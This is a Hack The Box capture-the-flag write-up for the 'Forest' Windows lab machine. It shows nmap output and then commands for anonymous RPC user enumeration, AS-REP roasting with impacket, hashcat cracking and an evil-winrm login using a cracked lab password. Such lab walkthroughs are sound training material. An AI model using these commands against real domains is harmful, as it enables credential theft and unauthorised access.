Post

Forest

Posted
By ChrisPham
views 2 min read

Writeup

After scanning, we know how many ports are opened, hostname and operating system is running on.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

nmap -sC -sV 10.129.50.75

Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 22:39 EST
Nmap scan report for 10.129.50.75
Host is up (0.054s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-31 03:46:01Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-31T03:46:05
|_  start_date: 2025-12-31T03:44:36
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2025-12-30T19:46:09-08:00
|_clock-skew: mean: 2h46m24s, deviation: 4h37m10s, median: 6m23s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

We can see that some useful ports are opened: 135-RPC 445-SMB 5985-WinRM. Let try which one we can connect with anonymous. After trying, I have this one

1

rpcclient -U "" -N "10.129.50.75"

Now let list all users with enumdomusers. Use cut to filter out the username. Now we have a list of user. Then, we may use the GetNPUsers script from the impacket to check which of these usernames has Kerberos pre-authentication disabled. This is called AS-REP-Roasting.

1

for user in $(cat list.txt); do GetNPUsers.py -no-pass -dc-ip 10.129.50.75 htb/${user} | grep -v Impacket; done

After running, we can notice which user has Kerberos ticket, then use hashcat to crack it.

1

hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Then use this credential to login with winrm, and get user’s flag.

1

evil-winrm -i "10.129.50.75" -u "svc-alfresco" -p "s3rvice"
HTB-machine, windows, easy
HTB CTF writeup nmap winrm rpc